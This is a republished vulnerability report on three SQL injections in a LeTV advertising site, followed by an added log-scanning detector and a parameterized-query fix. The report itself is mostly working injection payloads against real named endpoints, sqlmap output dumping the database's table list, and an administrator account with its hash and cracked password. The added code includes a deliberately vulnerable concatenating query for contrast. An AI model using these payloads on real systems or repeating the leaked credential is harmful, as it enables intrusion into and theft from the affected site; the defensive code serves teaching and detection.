
Three SQL injections on a LeTV (乐视网) site

程序员文章站 2022-07-07 22:38:24

A SQL injection on a LeTV site

http://ad.hz.letv.com/CJO/php/Save_ad_wph_cmt.php?remark=wph&name=1&text=%3Cinput+%2F%3E&pic=0&callback=jQuery17105813498379171187_1464161411962&_=1464161422761

Almost every parameter is injectable:

http://ad.hz.letv.com/CJO/php/Save_ad_wph_cmt.php?remark=wph' or left(user(),16)='[email protected]' and sleep(3) and '1'='1&name=1&text=%3Cinput+%2F%3E&pic=0&callback=jQuery17105813498379171187_1464161411962&_=1464161422761

The request is delayed, so the database user is:

[email protected]

http://ad.hz.letv.com/CJO/php/Save_ad_wph_cmt.php?remark=wph' or left(database(),2)='ad' and sleep(3) and '1'='1&name=1&text=%3Cinput+%2F%3E&pic=0&callback=jQuery17105813498379171187_1464161411962&_=1464161422761

The database is ad

POST request:

http://ad.hz.letv.com/benzc-class/php/jieda_list.php

Parameter:

province=1

http://ad.hz.letv.com/benzc-class/php/jieda_list.php

province=1' or '1'='2

Returns nothing

province=1' or '1'='1

Returns all rows

Another one:

POST:

http://ad.hz.letv.com/benzc-class/php/jieda_data.php

Parameters:

jjsonpcallback=jQuery220023386403540783274_1464161522072?province=%E5%8C%97%E4%BA%AC&city=%E5%8C%97%E4%BA%AC&name=%E6%B5%8B%E8%AF%95&daqu=%E6%97%A0&mobile=13800138000' or 1=1 and sleep(4) and '1'='1&sex=0&email=%E6%97%A0&interested=%E6%97%A0&memo2=http%3A%2F%2Fad.hz.letv.com%2Ftest%2Fbenzc%2Findex.html&buyCarTime=%E6%97%A0&jxsdm=%E6%97%A0&memo1=benzc&jxsname=%E5%8C%97%E4%BA%AC%E6%B3%A2%E5%A3%AB%E9%80%9A%E8%BE%BE%E6%B1%BD%E8%BD%A6%E9%94%80%E5%94%AE%E6%9C%8D%E5%8A%A1%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8

The mobile parameter is injectable: with or 1=1 the request is delayed, with or 1=2 it is not.
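The three findings above all leave the same footprints in the request data: a quote followed by an operator, a sleep() call for the time-based probes, a tautology such as '1'='1, or a UNION SELECT. The following detector is an added example written for this page (it is not part of the original report and not LeTV code): it decodes each parameter of a query string or form-encoded POST body and reports which signature fired. The access-log lines it scans are constructed for the example, modelled on the first endpoint in the report; the timestamps, client address and status codes are invented.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Signatures for the three injection styles the report demonstrates:
# time-based blind (sleep), boolean tautologies and UNION-based extraction,
# plus the quote-then-operator shape that all of its payloads share.
SIGNATURES = {
    "time-based": re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE),
    "tautology": re.compile(r"\bor\b\s*'?(\w+)'?\s*=\s*'?\1'?", re.IGNORECASE),
    "union": re.compile(r"\bunion\b\s+(all\s+)?select\b", re.IGNORECASE),
    "quote-break": re.compile(r"'\s*(and|or)\b", re.IGNORECASE),
}

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed log lines: a clean request to the first endpoint in the report,
# followed by the left(database(),2) probe percent-encoded the way a browser
# or proxy would send it. Client address, timestamps and sizes are invented.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/May/2016:14:50:22 +0800] "GET /CJO/php/Save_ad_wph_cmt.php'
    '?remark=wph&name=1&text=%3Cinput+%2F%3E&pic=0 HTTP/1.1" 200 57',
    '10.0.0.5 - - [25/May/2016:14:50:31 +0800] "GET /CJO/php/Save_ad_wph_cmt.php'
    '?remark=wph%27+or+left%28database%28%29%2C2%29%3D%27ad%27+and+sleep%283%29'
    '+and+%271%27%3D%271&name=1 HTTP/1.1" 200 57',
]


def scan_params(raw_query):
    """Map each parameter whose decoded value matches a signature to the list
    of signature names that fired. Works for GET query strings and for
    form-encoded POST bodies alike; the POST body is what the jieda_*.php
    endpoints receive, so it has to be logged or captured separately."""
    hits = {}
    for name, value in parse_qsl(raw_query, keep_blank_values=True):
        # parse_qsl already decoded once; decode again so a double-encoded
        # payload is normalised before matching.
        decoded = unquote_plus(value)
        fired = [sig for sig, rx in SIGNATURES.items() if rx.search(decoded)]
        if fired:
            hits[name] = fired
    return hits


def scan_log_line(line):
    """Extract method, path and query from one access-log line and scan the
    query. Returns None when the line carries no request."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    return {"method": m.group("method"), "path": path, "hits": scan_params(query)}


def flag_requests(lines):
    """Return only the scanned entries that have at least one signature hit."""
    flagged = []
    for line in lines:
        entry = scan_log_line(line)
        if entry and entry["hits"]:
            flagged.append(entry)
    return flagged


if __name__ == "__main__":
    for entry in flag_requests(SAMPLE_LOG):
        print(entry["method"], entry["path"], entry["hits"])
```

The tautology signature deliberately requires both sides of the comparison to be the same token, so the '1'='2 control request from the report is reported only as a quote-break, not as a tautology; keeping the two apart makes it easy to correlate a probe with its control in the same session. For the time-based findings, pairing these hits with the response-time field of the log (if the server records one) turns a pattern match into a confirmed finding.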

available databases [2]:
[*] ad
[*] information_schema

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: province=1' AND (SELECT * FROM (SELECT(SLEEP(5)))xQWX) AND 'AKoZ'='AKoZ

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: province=1' UNION ALL SELECT CONCAT(0x717a707871,0x4364574254444b78464a6c7a687a744b53664370565654464e78797272684f4b4b7149516b615766,0x7176706271)-- -
---
web application technology: PHP 5.3.19
back-end DBMS: MySQL >= 5.0.0
Database: ad
[91 tables]

+-----------------------------+
| BAM_data                    |
| CAMRY_data                  |
| CAMRY_list                  |
| UserName_data               |
| 'Dealer List$'_xlnm#Extract |
| Dealer List                 |
| a30_people                  |
| ad_car                      |
| ad_madinglin_shareNum       |
| ad_page_pv_num              |
| ad_record                   |
| ad_voteinfo                 |
| ad_voterecord               |
| ad_wph_cmt                  |
| ad_wph_online_time          |
| ad_wph_tel                  |
| add_jieqidata               |
| audi_2015_list              |
| audi_list                   |
| audi_list_bak               |
| audi_list_bak1              |
| audi_list_bak2              |
| audi_list_bak3              |
| baolai_data                 |
| baolai_list                 |
| baoshan_user_data           |
| baoshan_vip_card            |
| baoshan_vip_week            |
| benzc_data                  |
| benzc_list                  |
| changan_data                |
| changan_list                |
| createTab                   |
| diluerweimaData             |
| fiesta_car                  |
| fiesta_list                 |
| fute_car                    |
| fute_ld                     |
| fute_list                   |
| game_kp_bianhao             |
| game_kp_jpk                 |
| game_kp_user                |
| game_yao_info               |
| game_yao_jianhao            |
| golf_contact                |
| golf_data                   |
| golf_jialv_data             |
| golf_jialv_list             |
| golf_list                   |
| golf_people                 |
| hailan_data                 |
| hailan_list                 |
| highlander_data             |
| highlander_list             |
| hn_list                     |
| hn_record                   |
| infiniti_info               |
| infiniti_user               |
| jieda_data                  |
| jieda_data_bak_20150504     |
| jieda_list                  |
| jieda_list_yuan             |
| jieda_list_yuan2            |
| jys50_yuyue                 |
| kadjar_data                 |
| kadjar_list                 |
| lingmu_data                 |
| lingmu_list                 |
| linmu_list_city             |
| meten_phone                 |
| olay_record                 |
| olay_vote                   |
| op_admin_user               |
| op_books                    |
| op_lottery_sys              |
| op_signup                   |
| op_winner_list              |
| sj_prize                    |
| sj_userlist                 |
| tp_tab                      |
| tp_tab_ip                   |
| tz18_jianId                 |
| tz18_user                   |
| vezel_contact               |
| vezel_people                |
| wph_yaoqinma                |
| wutaigroup_cont             |
| y_prize                     |
| y_users                     |
| yifu_list                   |
| yili                        |
+-----------------------------+

Table: op_admin_user
[1 entry]
+-----+----------+----------+--------------------------------------------+---------------+
| uid | username | realname | password                                   | lastlogintime |
+-----+----------+----------+--------------------------------------------+---------------+
| 1   | admin    | oppo     | 408c06609ccabfc09e76f1807156d01c (abc_123) | 1458288536    |
+-----+----------+----------+--------------------------------------------+---------------+

The admin password is weak as well; a slap on the wrist.

Fix:

Filter the input.
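The report's one-word fix, filtering, is the weaker half of the remedy; the half that actually closes the class of bug is to stop splicing request parameters into SQL text. The example below is added here and is not the site's code: it rebuilds the province lookup behind jieda_list.php in two forms, the concatenating one the report's results imply and a parameterized one, and adds the allow-list check the report asks for on top. SQLite stands in for MySQL so it runs offline; the table layout, dealer names and province codes are constructed for the example.

```python
import re
import sqlite3


def build_db():
    """Constructed stand-in for the dealer table queried by jieda_list.php.
    Column names and rows are invented; only the shape matters here."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE jieda_list (id INTEGER PRIMARY KEY, province TEXT, dealer TEXT)"
    )
    conn.executemany(
        "INSERT INTO jieda_list (province, dealer) VALUES (?, ?)",
        [("1", "dealer-north-a"), ("1", "dealer-north-b"), ("2", "dealer-south-a")],
    )
    return conn


def lookup_vulnerable(conn, province):
    """The pattern the report's results imply: the request parameter is
    spliced into the SQL text, so a quote in the input rewrites the WHERE
    clause. province=1' or '1'='1 therefore returns every row and
    province=1' or '1'='2 returns only the genuine matches."""
    sql = (
        "SELECT dealer FROM jieda_list WHERE province = '" + province + "' ORDER BY id"
    )
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, province):
    """Placeholder binding: the driver passes the value separately from the
    SQL text, so the input is compared as data and can never change the
    statement's structure. The same payloads now match zero rows."""
    sql = "SELECT dealer FROM jieda_list WHERE province = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (province,))]


# Allow-list for the province code. The 1-4 digit shape is an assumption for
# this example; the real format should come from the application's own data.
PROVINCE_RE = re.compile(r"\d{1,4}")


def validate_province(value):
    """True only when the value is exactly a short numeric code."""
    return PROVINCE_RE.fullmatch(value) is not None


def lookup_hardened(conn, province):
    """Both layers together: reject anything outside the expected shape so
    malformed input is logged and refused early, then bind what remains."""
    if not validate_province(province):
        raise ValueError("province must be a numeric code")
    return lookup_parameterized(conn, province)


if __name__ == "__main__":
    db = build_db()
    probe = "1' or '1'='1"
    print("concatenated:", lookup_vulnerable(db, probe))
    print("parameterized:", lookup_parameterized(db, probe))
    print("hardened, valid input:", lookup_hardened(db, "1"))
```

In the PHP 5.3 stack sqlmap identified, the parameterized form corresponds to PDO prepared statements or mysqli bind_param; the validation layer is what the report means by filtering, and it is worth keeping even with binding in place, because it also catches the broken requests that a blind-injection scan leaves behind.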